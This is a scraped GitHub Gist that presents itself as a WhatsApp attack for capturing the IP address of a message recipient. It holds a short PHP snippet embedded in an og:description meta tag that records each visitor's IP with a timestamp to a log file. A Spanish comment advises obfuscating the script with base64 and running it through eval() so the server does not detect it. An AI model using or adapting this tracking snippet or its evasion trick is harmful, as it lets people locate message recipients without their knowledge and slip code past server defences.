Puede evitar que el servidor detecte la presencia de este Script si lo coloca en base64 ó encripta con MD5 ó algo similar y posteriormente lo desencripta al momento de ejecutar y utilzando el String desencriptado en tiempo de ejecución lo coloca en una función eval() de esta manera se corre sin mostrar el código plano al servidor.
Last active
October 9, 2021 23:19
-
-
Save Macorreag/3b6c9bc3bba20454e334f97dd38ed6f4 to your computer and use it in GitHub Desktop.
This is a whastapp attack to obtain IP of receiver message
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
This is explained in https://www.notion.so/macorreag/Capturar-una-rata-98216dd5c96545bba302c6cbd92b01a6 | |
--> | |
<meta property=»og:description» content=»<?php | |
echo $_SERVER[REMOTE_ADDR]; $line = date(’Y-m-d H:i:s’) . » – $_SERVER[REMOTE_ADDR]»;echo $line; | |
file_put_contents(’visitors.log’, $line . PHP_EOL, FILE_APPEND);?>» /> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment